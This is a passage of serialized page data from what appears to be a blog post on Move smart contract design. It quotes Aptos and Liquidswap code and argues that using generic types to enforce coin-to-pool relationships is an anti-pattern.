storable\n",{"type":25,"tag":216,"props":9848,"children":9849},{"class":6922,"line":6769},[9850,9854,9858,9862,9866,9871,9875,9879,9884,9888,9893],{"type":25,"tag":216,"props":9851,"children":9852},{"style":6936},[9853],{"type":31,"value":9747},{"type":25,"tag":216,"props":9855,"children":9856},{"style":7375},[9857],{"type":31,"value":9752},{"type":25,"tag":216,"props":9859,"children":9860},{"style":6964},[9861],{"type":31,"value":9757},{"type":25,"tag":216,"props":9863,"children":9864},{"style":6947},[9865],{"type":31,"value":9762},{"type":25,"tag":216,"props":9867,"children":9868},{"style":7375},[9869],{"type":31,"value":9870}," T",{"type":25,"tag":216,"props":9872,"children":9873},{"style":6964},[9874],{"type":31,"value":9772},{"type":25,"tag":216,"props":9876,"children":9877},{"style":6947},[9878],{"type":31,"value":9777},{"type":25,"tag":216,"props":9880,"children":9881},{"style":6947},[9882],{"type":31,"value":9883}," key",{"type":25,"tag":216,"props":9885,"children":9886},{"style":6964},[9887],{"type":31,"value":7026},{"type":25,"tag":216,"props":9889,"children":9890},{"style":6947},[9891],{"type":31,"value":9892},"store",{"type":25,"tag":216,"props":9894,"children":9895},{"style":6964},[9896],{"type":31,"value":7241},{"type":25,"tag":216,"props":9898,"children":9899},{"class":6922,"line":6778},[9900,9905,9909],{"type":25,"tag":216,"props":9901,"children":9902},{"style":6947},[9903],{"type":31,"value":9904},"      id",{"type":25,"tag":216,"props":9906,"children":9907},{"style":6953},[9908],{"type":31,"value":1472},{"type":25,"tag":216,"props":9910,"children":9911},{"style":6964},[9912],{"type":31,"value":9913}," UID,\n",{"type":25,"tag":216,"props":9915,"children":9916},{"class":6922,"line":7005},[9917,9922,9926,9931,9935,9939],{"type":25,"tag":216,"props":9918,"children":9919},{"style":6947},[9920],{"type":31,"value":9921},"      balance",{"type":25,"tag":216,"props":9923,"children":9924},{"style":6953},[9925],{"type":31,"value":1472},{"type":25,"tag":216,"props":9927,"children":9928},{"style":7375},[9929],{"type":31,"value":9930}," Balance",{"type":25,"tag":216,"props":9932,"children":9933},{"style":6964},[9934],{"type":31,"value":9757},{"type":25,"tag":216,"props":9936,"children":9937},{"style":7375},[9938],{"type":31,"value":177},{"type":25,"tag":216,"props":9940,"children":9941},{"style":6964},[9942],{"type":31,"value":9943},">\n",{"type":25,"tag":216,"props":9945,"children":9946},{"class":6922,"line":7110},[9947],{"type":25,"tag":216,"props":9948,"children":9949},{"style":6964},[9950],{"type":31,"value":9823},{"type":25,"tag":38,"props":9952,"children":9953},{},[9954],{"type":25,"tag":64,"props":9955,"children":9956},{},[9957],{"type":31,"value":9958},"sui",{"type":25,"tag":38,"props":9960,"children":9961},{},[9962,9964,9971,9973,9979],{"type":31,"value":9963},"Pulling an example from ",{"type":25,"tag":162,"props":9965,"children":9968},{"href":9966,"rel":9967},"https://pontem.network/",[166],[9969],{"type":31,"value":9970},"Pontem Network's",{"type":31,"value":9972}," Liquidswap DEX implementation on Aptos, we can see that ",{"type":25,"tag":82,"props":9974,"children":9976},{"className":9975},[],[9977],{"type":31,"value":9978},"LiquidityPool",{"type":31,"value":9980}," natively embeds this type information into it's fields.",{"type":25,"tag":206,"props":9982,"children":9984},{"className":6915,"code":9983,"language":6914,"meta":7,"style":7},"    /// Liquidity pool with reserves.\n    struct LiquidityPool\u003Cphantom X, phantom Y, phantom LP> has key {\n        coin_x_reserve: Coin\u003CX>,\n        coin_y_reserve: Coin\u003CY>,\n        // ...\n    }\n",[9985],{"type":25,"tag":82,"props":9986,"children":9987},{"__ignoreMap":7},[9988,9996,10060,10090,10119,10127],{"type":25,"tag":216,"props":9989,"children":9990},{"class":6922,"line":6923},[9991],{"type":25,"tag":216,"props":9992,"children":9993},{"style":6927},[9994],{"type":31,"value":9995},"    /// Liquidity pool with reserves.\n",{"type":25,"tag":216,"props":9997,"children":9998},{"class":6922,"line":6769},[9999,10004,10009,10013,10017,10022,10026,10030,10035,10039,10043,10048,10052,10056],{"type":25,"tag":216,"props":10000,"children":10001},{"style":6936},[10002],{"type":31,"value":10003},"    struct",{"type":25,"tag":216,"props":10005,"children":10006},{"style":7375},[10007],{"type":31,"value":10008}," LiquidityPool",{"type":25,"tag":216,"props":10010,"children":10011},{"style":6964},[10012],{"type":31,"value":9757},{"type":25,"tag":216,"props":10014,"children":10015},{"style":6947},[10016],{"type":31,"value":9762},{"type":25,"tag":216,"props":10018,"children":10019},{"style":7375},[10020],{"type":31,"value":10021}," X",{"type":25,"tag":216,"props":10023,"children":10024},{"style":6964},[10025],{"type":31,"value":7026},{"type":25,"tag":216,"props":10027,"children":10028},{"style":6947},[10029],{"type":31,"value":9762},{"type":25,"tag":216,"props":10031,"children":10032},{"style":7375},[10033],{"type":31,"value":10034}," Y",{"type":25,"tag":216,"props":10036,"children":10037},{"style":6964},[10038],{"type":31,"value":7026},{"type":25,"tag":216,"props":10040,"children":10041},{"style":6947},[10042],{"type":31,"value":9762},{"type":25,"tag":216,"props":10044,"children":10045},{"style":6964},[10046],{"type":31,"value":10047}," LP> ",{"type":25,"tag":216,"props":10049,"children":10050},{"style":6947},[10051],{"type":31,"value":9777},{"type":25,"tag":216,"props":10053,"children":10054},{"style":6947},[10055],{"type":31,"value":9883},{"type":25,"tag":216,"props":10057,"children":10058},{"style":6964},[10059],{"type":31,"value":7241},{"type":25,"tag":216,"props":10061,"children":10062},{"class":6922,"line":6778},[10063,10068,10072,10076,10080,10085],{"type":25,"tag":216,"props":10064,"children":10065},{"style":6947},[10066],{"type":31,"value":10067},"        coin_x_reserve",{"type":25,"tag":216,"props":10069,"children":10070},{"style":6953},[10071],{"type":31,"value":1472},{"type":25,"tag":216,"props":10073,"children":10074},{"style":7375},[10075],{"type":31,"value":9752},{"type":25,"tag":216,"props":10077,"children":10078},{"style":6964},[10079],{"type":31,"value":9757},{"type":25,"tag":216,"props":10081,"children":10082},{"style":7375},[10083],{"type":31,"value":10084},"X",{"type":25,"tag":216,"props":10086,"children":10087},{"style":6964},[10088],{"type":31,"value":10089},">,\n",{"type":25,"tag":216,"props":10091,"children":10092},{"class":6922,"line":7005},[10093,10098,10102,10106,10110,10115],{"type":25,"tag":216,"props":10094,"children":10095},{"style":6947},[10096],{"type":31,"value":10097},"        coin_y_reserve",{"type":25,"tag":216,"props":10099,"children":10100},{"style":6953},[10101],{"type":31,"value":1472},{"type":25,"tag":216,"props":10103,"children":10104},{"style":7375},[10105],{"type":31,"value":9752},{"type":25,"tag":216,"props":10107,"children":10108},{"style":6964},[10109],{"type":31,"value":9757},{"type":25,"tag":216,"props":10111,"children":10112},{"style":7375},[10113],{"type":31,"value":10114},"Y",{"type":25,"tag":216,"props":10116,"children":10117},{"style":6964},[10118],{"type":31,"value":10089},{"type":25,"tag":216,"props":10120,"children":10121},{"class":6922,"line":7110},[10122],{"type":25,"tag":216,"props":10123,"children":10124},{"style":6927},[10125],{"type":31,"value":10126},"        // ...\n",{"type":25,"tag":216,"props":10128,"children":10129},{"class":6922,"line":7216},[10130],{"type":25,"tag":216,"props":10131,"children":10132},{"style":6964},[10133],{"type":31,"value":7311},{"type":25,"tag":38,"props":10135,"children":10136},{},[10137],{"type":31,"value":10138},"This has the advantage of aligning type information at compile time. It would be difficult to accidentally pass in the wrong type of coin to a function.",{"type":25,"tag":206,"props":10140,"children":10142},{"className":6915,"code":10141,"language":6914,"meta":7,"style":7},"      public fun mint\u003CX, Y, LP>(\n          pool_addr: address,\n          coin_x: Coin\u003CX>,\n          coin_y: Coin\u003CY>\n      ): Coin\u003CLP> acquires LiquidityPool, EventsStore {\n          // ...\n\n          let (x_reserve_size, y_reserve_size) = get_reserves_size\u003CX, Y, LP>(pool_addr);\n",[10143],{"type":25,"tag":82,"props":10144,"children":10145},{"__ignoreMap":7},[10146,10185,10206,10234,10262,10313,10321,10328],{"type":25,"tag":216,"props":10147,"children":10148},{"class":6922,"line":6923},[10149,10154,10159,10164,10168,10172,10176,10180],{"type":25,"tag":216,"props":10150,"children":10151},{"style":6947},[10152],{"type":31,"value":10153},"      public",{"type":25,"tag":216,"props":10155,"children":10156},{"style":6947},[10157],{"type":31,"value":10158}," fun",{"type":25,"tag":216,"props":10160,"children":10161},{"style":6947},[10162],{"type":31,"value":10163}," mint",{"type":25,"tag":216,"props":10165,"children":10166},{"style":6964},[10167],{"type":31,"value":9757},{"type":25,"tag":216,"props":10169,"children":10170},{"style":7375},[10171],{"type":31,"value":10084},{"type":25,"tag":216,"props":10173,"children":10174},{"style":6964},[10175],{"type":31,"value":7026},{"type":25,"tag":216,"props":10177,"children":10178},{"style":7375},[10179],{"type":31,"value":10114},{"type":25,"tag":216,"props":10181,"children":10182},{"style":6964},[10183],{"type":31,"value":10184},", LP>(\n",{"type":25,"tag":216,"props":10186,"children":10187},{"class":6922,"line":6769},[10188,10193,10197,10202],{"type":25,"tag":216,"props":10189,"children":10190},{"style":6947},[10191],{"type":31,"value":10192},"          pool_addr",{"type":25,"tag":216,"props":10194,"children":10195},{"style":6953},[10196],{"type":31,"value":1472},{"type":25,"tag":216,"props":10198,"children":10199},{"style":6947},[10200],{"type":31,"value":10201}," address",{"type":25,"tag":216,"props":10203,"children":10204},{"style":6964},[10205],{"type":31,"value":7465},{"type":25,"tag":216,"props":10207,"children":10208},{"class":6922,"line":6778},[10209,10214,10218,10222,10226,10230],{"type":25,"tag":216,"props":10210,"children":10211},{"style":6947},[10212],{"type":31,"value":10213},"          coin_x",{"type":25,"tag":216,"props":10215,"children":10216},{"style":6953},[10217],{"type":31,"value":1472},{"type":25,"tag":216,"props":10219,"children":10220},{"style":7375},[10221],{"type":31,"value":9752},{"type":25,"tag":216,"props":10223,"children":10224},{"style":6964},[10225],{"type":31,"value":9757},{"type":25,"tag":216,"props":10227,"children":10228},{"style":7375},[10229],{"type":31,"value":10084},{"type":25,"tag":216,"props":10231,"children":10232},{"style":6964},[10233],{"type":31,"value":10089},{"type":25,"tag":216,"props":10235,"children":10236},{"class":6922,"line":7005},[10237,10242,10246,10250,10254,10258],{"type":25,"tag":216,"props":10238,"children":10239},{"style":6947},[10240],{"type":31,"value":10241},"          coin_y",{"type":25,"tag":216,"props":10243,"children":10244},{"style":6953},[10245],{"type":31,"value":1472},{"type":25,"tag":216,"props":10247,"children":10248},{"style":7375},[10249],{"type":31,"value":9752},{"type":25,"tag":216,"props":10251,"children":10252},{"style":6964},[10253],{"type":31,"value":9757},{"type":25,"tag":216,"props":10255,"children":10256},{"style":7375},[10257],{"type":31,"value":10114},{"type":25,"tag":216,"props":10259,"children":10260},{"style":6964},[10261],{"type":31,"value":9943},{"type":25,"tag":216,"props":10263,"children":10264},{"class":6922,"line":7110},[10265,10270,10274,10278,10282,10287,10291,10296,10300,10304,10309],{"type":25,"tag":216,"props":10266,"children":10267},{"style":6964},[10268],{"type":31,"value":10269},"      )",{"type":25,"tag":216,"props":10271,"children":10272},{"style":6953},[10273],{"type":31,"value":1472},{"type":25,"tag":216,"props":10275,"children":10276},{"style":7375},[10277],{"type":31,"value":9752},{"type":25,"tag":216,"props":10279,"children":10280},{"style":6964},[10281],{"type":31,"value":9757},{"type":25,"tag":216,"props":10283,"children":10284},{"style":7375},[10285],{"type":31,"value":10286},"LP",{"type":25,"tag":216,"props":10288,"children":10289},{"style":6964},[10290],{"type":31,"value":9772},{"type":25,"tag":216,"props":10292,"children":10293},{"style":6947},[10294],{"type":31,"value":10295},"acquires",{"type":25,"tag":216,"props":10297,"children":10298},{"style":7375},[10299],{"type":31,"value":10008},{"type":25,"tag":216,"props":10301,"children":10302},{"style":6964},[10303],{"type":31,"value":7026},{"type":25,"tag":216,"props":10305,"children":10306},{"style":7375},[10307],{"type":31,"value":10308},"EventsStore",{"type":25,"tag":216,"props":10310,"children":10311},{"style":6964},[10312],{"type":31,"value":7241},{"type":25,"tag":216,"props":10314,"children":10315},{"class":6922,"line":7216},[10316],{"type":25,"tag":216,"props":10317,"children":10318},{"style":6927},[10319],{"type":31,"value":10320},"          // ...\n",{"type":25,"tag":216,"props":10322,"children":10323},{"class":6922,"line":7244},[10324],{"type":25,"tag":216,"props":10325,"children":10326},{"emptyLinePlaceholder":16},[10327],{"type":31,"value":7642},{"type":25,"tag":216,"props":10329,"children":10330},{"class":6922,"line":7257},[10331,10336,10340,10345,10349,10354,10358,10362,10367,10371,10375,10379,10383,10388,10393],{"type":25,"tag":216,"props":10332,"children":10333},{"style":6936},[10334],{"type":31,"value":10335},"          let",{"type":25,"tag":216,"props":10337,"children":10338},{"style":6964},[10339],{"type":31,"value":7016},{"type":25,"tag":216,"props":10341,"children":10342},{"style":6947},[10343],{"type":31,"value":10344},"x_reserve_size",{"type":25,"tag":216,"props":10346,"children":10347},{"style":6964},[10348],{"type":31,"value":7026},{"type":25,"tag":216,"props":10350,"children":10351},{"style":6947},[10352],{"type":31,"value":10353},"y_reserve_size",{"type":25,"tag":216,"props":10355,"children":10356},{"style":6964},[10357],{"type":31,"value":7036},{"type":25,"tag":216,"props":10359,"children":10360},{"style":6953},[10361],{"type":31,"value":266},{"type":25,"tag":216,"props":10363,"children":10364},{"style":6947},[10365],{"type":31,"value":10366}," get_reserves_size",{"type":25,"tag":216,"props":10368,"children":10369},{"style":6964},[10370],{"type":31,"value":9757},{"type":25,"tag":216,"props":10372,"children":10373},{"style":7375},[10374],{"type":31,"value":10084},{"type":25,"tag":216,"props":10376,"children":10377},{"style":6964},[10378],{"type":31,"value":7026},{"type":25,"tag":216,"props":10380,"children":10381},{"style":7375},[10382],{"type":31,"value":10114},{"type":25,"tag":216,"props":10384,"children":10385},{"style":6964},[10386],{"type":31,"value":10387},", LP>(",{"type":25,"tag":216,"props":10389,"children":10390},{"style":6947},[10391],{"type":31,"value":10392},"pool_addr",{"type":25,"tag":216,"props":10394,"children":10395},{"style":6964},[10396],{"type":31,"value":7797},{"type":25,"tag":38,"props":10398,"children":10399},{},[10400,10402,10408,10410,10417],{"type":31,"value":10401},"As an aside, this generic type information is implemented at runtime in the ",{"type":25,"tag":82,"props":10403,"children":10405},{"className":10404},[],[10406],{"type":31,"value":10407},"ty_args",{"type":31,"value":10409}," ",{"type":25,"tag":162,"props":10411,"children":10414},{"href":10412,"rel":10413},"https://github.com/move-language/move/blob/2412f877a5065132f31bfc339e6d1f2b9de10e87/language/move-vm/runtime/src/interpreter.rs#L88",[166],[10415],{"type":31,"value":10416},"at the vm level",{"type":31,"value":10418},". This VM level implementation choice makes it rather difficult to iterate over arbitrary generic types, such as with summing the coins in a pool. We will be releasing a deep dive into move's VM internals shortly.",{"type":25,"tag":38,"props":10420,"children":10421},{},[10422,10424,10430,10432,10438,10440,10446,10447,10453],{"type":31,"value":10423},"In pseucode, this checks that ",{"type":25,"tag":82,"props":10425,"children":10427},{"className":10426},[],[10428],{"type":31,"value":10429},"coin_x.type",{"type":31,"value":10431}," is equal to ",{"type":25,"tag":82,"props":10433,"children":10435},{"className":10434},[],[10436],{"type":31,"value":10437},"pool.x_type",{"type":31,"value":10439},", and ",{"type":25,"tag":82,"props":10441,"children":10443},{"className":10442},[],[10444],{"type":31,"value":10445},"coin_y.type",{"type":31,"value":10431},{"type":25,"tag":82,"props":10448,"children":10450},{"className":10449},[],[10451],{"type":31,"value":10452},"pool.y_type",{"type":31,"value":179},{"type":25,"tag":38,"props":10455,"children":10456},{},[10457],{"type":31,"value":10458},"This type system has two advantages",{"type":25,"tag":6711,"props":10460,"children":10461},{},[10462,10474],{"type":25,"tag":2043,"props":10463,"children":10464},{},[10465,10467,10472],{"type":31,"value":10466},"It's required. The type parameter ",{"type":25,"tag":64,"props":10468,"children":10469},{},[10470],{"type":31,"value":10471},"must",{"type":31,"value":10473}," be specified so it's impossible to forget such a constraint",{"type":25,"tag":2043,"props":10475,"children":10476},{},[10477],{"type":31,"value":10478},"It's concise. Constraints are done via type parameter alignment instead of verbose equivalence checks",{"type":25,"tag":38,"props":10480,"children":10481},{},[10482],{"type":31,"value":10483},"However, this system isn't perfect.",{"type":25,"tag":38,"props":10485,"children":10486},{},[10487,10489,10494],{"type":31,"value":10488},"In fact, I would go as far as to argue that using types to create such associations is ",{"type":25,"tag":9273,"props":10490,"children":10491},{},[10492],{"type":31,"value":10493},"an anti-pattern",{"type":31,"value":179},{"type":25,"tag":38,"props":10496,"children":10497},{},[10498,10500,10506],{"type":31,"value":10499},"Using types to enforce relationships only works because types are uniquely associated with instances. For example, in Aptos's coin initialization function, they explicitly assert that there hasn't been a previously initialized ",{"type":25,"tag":82,"props":10501,"children":10503},{"className":10502},[],[10504],{"type":31,"value":10505},"CoinInfo\u003CCoinType>",{"type":31,"value":179},{"type":25,"tag":206,"props":10508,"children":10510},{"className":6915,"code":10509,"language":6914,"meta":7,"style":7},"  fun initialize_internal\u003CCoinType>(\n      // ...\n  ): (BurnCapability\u003CCoinType>, FreezeCapability\u003CCoinType>, MintCapability\u003CCoinType>) {\n      // ...\n\n      assert!(\n          !exists\u003CCoinInfo\u003CCoinType>>(account_addr),\n          error::already_exists(ECOIN_INFO_ALREADY_PUBLISHED),\n      );\n",[10511],{"type":25,"tag":82,"props":10512,"children":10513},{"__ignoreMap":7},[10514,10541,10549,10618,10625,10632,10644,10689,10711],{"type":25,"tag":216,"props":10515,"children":10516},{"class":6922,"line":6923},[10517,10522,10527,10531,10536],{"type":25,"tag":216,"props":10518,"children":10519},{"style":6947},[10520],{"type":31,"value":10521},"  fun",{"type":25,"tag":216,"props":10523,"children":10524},{"style":6947},[10525],{"type":31,"value":10526}," initialize_internal",{"type":25,"tag":216,"props":10528,"children":10529},{"style":6964},[10530],{"type":31,"value":9757},{"type":25,"tag":216,"props":10532,"children":10533},{"style":7375},[10534],{"type":31,"value":10535},"CoinType",{"type":25,"tag":216,"props":10537,"children":10538},{"style":6964},[10539],{"type":31,"value":10540},">(\n",{"type":25,"tag":216,"props":10542,"children":10543},{"class":6922,"line":6769},[10544],{"type":25,"tag":216,"props":10545,"children":10546},{"style":6927},[10547],{"type":31,"value":10548},"      // ...\n",{"type":25,"tag":216,"props":10550,"children":10551},{"class":6922,"line":6778},[10552,10557,10561,10565,10570,10574,10578,10583,10588,10592,10596,10600,10605,10609,10613],{"type":25,"tag":216,"props":10553,"children":10554},{"style":6964},[10555],{"type":31,"value":10556},"  )",{"type":25,"tag":216,"props":10558,"children":10559},{"style":6953},[10560],{"type":31,"value":1472},{"type":25,"tag":216,"props":10562,"children":10563},{"style":6964},[10564],{"type":31,"value":7016},{"type":25,"tag":216,"props":10566,"children":10567},{"style":7375},[10568],{"type":31,"value":10569},"BurnCapability",{"type":25,"tag":216,"props":10571,"children":10572},{"style":6964},[10573],{"type":31,"value":9757},{"type":25,"tag":216,"props":10575,"children":10576},{"style":7375},[10577],{"type":31,"value":10535},{"type":25,"tag":216,"props":10579,"children":10580},{"style":6964},[10581],{"type":31,"value":10582},">, ",{"type":25,"tag":216,"props":10584,"children":10585},{"style":7375},[10586],{"type":31,"value":10587},"FreezeCapability",{"type":25,"tag":216,"props":10589,"children":10590},{"style":6964},[10591],{"type":31,"value":9757},{"type":25,"tag":216,"props":10593,"children":10594},{"style":7375},[10595],{"type":31,"value":10535},{"type":25,"tag":216,"props":10597,"children":10598},{"style":6964},[10599],{"type":31,"value":10582},{"type":25,"tag":216,"props":10601,"children":10602},{"style":7375},[10603],{"type":31,"value":10604},"MintCapability",{"type":25,"tag":216,"props":10606,"children":10607},{"style":6964},[10608],{"type":31,"value":9757},{"type":25,"tag":216,"props":10610,"children":10611},{"style":7375},[10612],{"type":31,"value":10535},{"type":25,"tag":216,"props":10614,"children":10615},{"style":6964},[10616],{"type":31,"value":10617},">) {\n",{"type":25,"tag":216,"props":10619,"children":10620},{"class":6922,"line":7005},[10621],{"type":25,"tag":216,"props":10622,"children":10623},{"style":6927},[10624],{"type":31,"value":10548},{"type":25,"tag":216,"props":10626,"children":10627},{"class":6922,"line":7110},[10628],{"type":25,"tag":216,"props":10629,"children":10630},{"emptyLinePlaceholder":16},[10631],{"type":31,"value":7642},{"type":25,"tag":216,"props":10633,"children":10634},{"class":6922,"line":7216},[10635,10640],{"type":25,"tag":216,"props":10636,"children":10637},{"style":7047},[10638],{"type":31,"value":10639},"      assert!",{"type":25,"tag":216,"props":10641,"children":10642},{"style":6964},[10643],{"type":31,"value":7420},{"type":25,"tag":216,"props":10645,"children":10646},{"class":6922,"line":7244},[10647,10652,10657,10661,10666,10670,10674,10679,10684],{"type":25,"tag":216,"props":10648,"children":10649},{"style":6953},[10650],{"type":31,"value":10651},"          !",{"type":25,"tag":216,"props":10653,"children":10654},{"style":6947},[10655],{"type":31,"value":10656},"exists",{"type":25,"tag":216,"props":10658,"children":10659},{"style":6964},[10660],{"type":31,"value":9757},{"type":25,"tag":216,"props":10662,"children":10663},{"style":7375},[10664],{"type":31,"value":10665},"CoinInfo",{"type":25,"tag":216,"props":10667,"children":10668},{"style":6964},[10669],{"type":31,"value":9757},{"type":25,"tag":216,"props":10671,"children":10672},{"style":7375},[10673],{"type":31,"value":10535},{"type":25,"tag":216,"props":10675,"children":10676},{"style":6964},[10677],{"type":31,"value":10678},">>(",{"type":25,"tag":216,"props":10680,"children":10681},{"style":6947},[10682],{"type":31,"value":10683},"account_addr",{"type":25,"tag":216,"props":10685,"children":10686},{"style":6964},[10687],{"type":31,"value":10688},"),\n",{"type":25,"tag":216,"props":10690,"children":10691},{"class":6922,"line":7257},[10692,10697,10701,10706],{"type":25,"tag":216,"props":10693,"children":10694},{"style":6964},[10695],{"type":31,"value":10696},"          error",{"type":25,"tag":216,"props":10698,"children":10699},{"style":6953},[10700],{"type":31,"value":7438},{"type":25,"tag":216,"props":10702,"children":10703},{"style":7047},[10704],{"type":31,"value":10705},"already_exists",{"type":25,"tag":216,"props":10707,"children":10708},{"style":6964},[10709],{"type":31,"value":10710},"(ECOIN_INFO_ALREADY_PUBLISHED),\n",{"type":25,"tag":216,"props":10712,"children":10713},{"class":6922,"line":7275},[10714],{"type":25,"tag":216,"props":10715,"children":10716},{"style":6964},[10717],{"type":31,"value":10718},"      );\n",{"type":25,"tag":38,"props":10720,"children":10721},{},[10722,10724,10729],{"type":31,"value":10723},"While this ",{"type":25,"tag":82,"props":10725,"children":10727},{"className":10726},[],[10728],{"type":31,"value":10665},{"type":31,"value":10730}," isn't returned directly, it still ensures uniqueness of the capability objects.",{"type":25,"tag":38,"props":10732,"children":10733},{},[10734,10736,10743],{"type":31,"value":10735},"Similarly, consider ",{"type":25,"tag":162,"props":10737,"children":10740},{"href":10738,"rel":10739},"https://ariesmarkets.xyz/",[166],[10741],{"type":31,"value":10742},"Aries Markets",{"type":31,"value":10744},", a lending/borrowing protocol building on Aptos.",{"type":25,"tag":38,"props":10746,"children":10747},{},[10748,10750,10756],{"type":31,"value":10749},"Their ",{"type":25,"tag":82,"props":10751,"children":10753},{"className":10752},[],[10754],{"type":31,"value":10755},"ReserveCoinContainer",{"type":31,"value":10757}," struct stores all the relevant data and resources for managing a lending market.",{"type":25,"tag":206,"props":10759,"children":10761},{"className":6915,"code":10760,"language":6914,"meta":7,"style":7},"  /// The struct to hold all the underlying `Coin`s.\n  /// Stored as a resources.\n  struct ReserveCoinContainer\u003Cphantom Coin0> has key {\n      /// Stores the available `Coin`.\n      underlying_coin: Coin\u003CCoin0>,\n      /// Stores the LP `Coin` that act as collateral.\n      collateralised_lp_coin: Coin\u003CLP\u003CCoin0>>,\n      /// Mint capability for LP Coin.\n      mint_capability: MintCapability\u003CLP\u003CCoin0>>,\n      /// Burn capability for LP Coin.\n      burn_capability: BurnCapability\u003CLP\u003CCoin0>>,\n\n      // ...\n  }\n\n",[10762],{"type":25,"tag":82,"props":10763,"children":10764},{"__ignoreMap":7},[10765,10773,10781,10822,10830,10859,10867,10904,10912,10949,10957,10994,11001,11008],{"type":25,"tag":216,"props":10766,"children":10767},{"class":6922,"line":6923},[10768],{"type":25,"tag":216,"props":10769,"children":10770},{"style":6927},[10771],{"type":31,"value":10772},"  /// The struct to hold all the underlying `Coin`s.\n",{"type":25,"tag":216,"props":10774,"children":10775},{"class":6922,"line":6769},[10776],{"type":25,"tag":216,"props":10777,"children":10778},{"style":6927},[10779],{"type":31,"value":10780},"  /// Stored as a resources.\n",{"type":25,"tag":216,"props":10782,"children":10783},{"class":6922,"line":6778},[10784,10788,10793,10797,10801,10806,10810,10814,10818],{"type":25,"tag":216,"props":10785,"children":10786},{"style":6936},[10787],{"type":31,"value":9747},{"type":25,"tag":216,"props":10789,"children":10790},{"style":7375},[10791],{"type":31,"value":10792}," ReserveCoinContainer",{"type":25,"tag":216,"props":10794,"children":10795},{"style":6964},[10796],{"type":31,"value":9757},{"type":25,"tag":216,"props":10798,"children":10799},{"style":6947},[10800],{"type":31,"value":9762},{"type":25,"tag":216,"props":10802,"children":10803},{"style":7375},[10804],{"type":31,"value":10805}," Coin0",{"type":25,"tag":216,"props":10807,"children":10808},{"style":6964},[10809],{"type":31,"value":9772},{"type":25,"tag":216,"props":10811,"children":10812},{"style":6947},[10813],{"type":31,"value":9777},{"type":25,"tag":216,"props":10815,"children":10816},{"style":6947},[10817],{"type":31,"value":9883},{"type":25,"tag":216,"props":10819,"children":10820},{"style":6964},[10821],{"type":31,"value":7241},{"type":25,"tag":216,"props":10823,"children":10824},{"class":6922,"line":7005},[10825],{"type":25,"tag":216,"props":10826,"children":10827},{"style":6927},[10828],{"type":31,"value":10829},"      /// Stores the available `Coin`.\n",{"type":25,"tag":216,"props":10831,"children":10832},{"class":6922,"line":7110},[10833,10838,10842,10846,10850,10855],{"type":25,"tag":216,"props":10834,"children":10835},{"style":6947},[10836],{"type":31,"value":10837},"      underlying_coin",{"type":25,"tag":216,"props":10839,"children":10840},{"style":6953},[10841],{"type":31,"value":1472},{"type":25,"tag":216,"props":10843,"children":10844},{"style":7375},[10845],{"type":31,"value":9752},{"type":25,"tag":216,"props":10847,"children":10848},{"style":6964},[10849],{"type":31,"value":9757},{"type":25,"tag":216,"props":10851,"children":10852},{"style":7375},[10853],{"type":31,"value":10854},"Coin0",{"type":25,"tag":216,"props":10856,"children":10857},{"style":6964},[10858],{"type":31,"value":10089},{"type":25,"tag":216,"props":10860,"children":10861},{"class":6922,"line":7216},[10862],{"type":25,"tag":216,"props":10863,"children":10864},{"style":6927},[10865],{"type":31,"value":10866},"      /// Stores the LP `Coin` that act as collateral.\n",{"type":25,"tag":216,"props":10868,"children":10869},{"class":6922,"line":7244},[10870,10875,10879,10883,10887,10891,10895,10899],{"type":25,"tag":216,"props":10871,"children":10872},{"style":6947},[10873],{"type":31,"value":10874},"      collateralised_lp_coin",{"type":25,"tag":216,"props":10876,"children":10877},{"style":6953},[10878],{"type":31,"value":1472},{"type":25,"tag":216,"props":10880,"children":10881},{"style":7375},[10882],{"type":31,"value":9752},{"type":25,"tag":216,"props":10884,"children":10885},{"style":6964},[10886],{"type":31,"value":9757},{"type":25,"tag":216,"props":10888,"children":10889},{"style":7375},[10890],{"type":31,"value":10286},{"type":25,"tag":216,"props":10892,"children":10893},{"style":6964},[10894],{"type":31,"value":9757},{"type":25,"tag":216,"props":10896,"children":10897},{"style":7375},[10898],{"type":31,"value":10854},{"type":25,"tag":216,"props":10900,"children":10901},{"style":6964},[10902],{"type":31,"value":10903},">>,\n",{"type":25,"tag":216,"props":10905,"children":10906},{"class":6922,"line":7257},[10907],{"type":25,"tag":216,"props":10908,"children":10909},{"style":6927},[10910],{"type":31,"value":10911},"      /// Mint capability for LP Coin.\n",{"type":25,"tag":216,"props":10913,"children":10914},{"class":6922,"line":7275},[10915,10920,10924,10929,10933,10937,10941,10945],{"type":25,"tag":216,"props":10916,"children":10917},{"style":6947},[10918],{"type":31,"value":10919},"      mint_capability",{"type":25,"tag":216,"props":10921,"children":10922},{"style":6953},[10923],{"type":31,"value":1472},{"type":25,"tag":216,"props":10925,"children":10926},{"style":7375},[10927],{"type":31,"value":10928}," MintCapability",{"type":25,"tag":216,"props":10930,"children":10931},{"style":6964},[10932],{"type":31,"value":9757},{"type":25,"tag":216,"props":10934,"children":10935},{"style":7375},[10936],{"type":31,"value":10286},{"type":25,"tag":216,"props":10938,"children":10939},{"style":6964},[10940],{"type":31,"value":9757},{"type":25,"tag":216,"props":10942,"children":10943},{"style":7375},[10944],{"type":31,"value":10854},{"type":25,"tag":216,"props":10946,"children":10947},{"style":6964},[10948],{"type":31,"value":10903},{"type":25,"tag":216,"props":10950,"children":10951},{"class":6922,"line":7296},[10952],{"type":25,"tag":216,"props":10953,"children":10954},{"style":6927},[10955],{"type":31,"value":10956},"      /// Burn capability for LP Coin.\n",{"type":25,"tag":216,"props":10958,"children":10959},{"class":6922,"line":7305},[10960,10965,10969,10974,10978,10982,10986,10990],{"type":25,"tag":216,"props":10961,"children":10962},{"style":6947},[10963],{"type":31,"value":10964},"      burn_capability",{"type":25,"tag":216,"props":10966,"children":10967},{"style":6953},[10968],{"type":31,"value":1472},{"type":25,"tag":216,"props":10970,"children":10971},{"style":7375},[10972],{"type":31,"value":10973}," 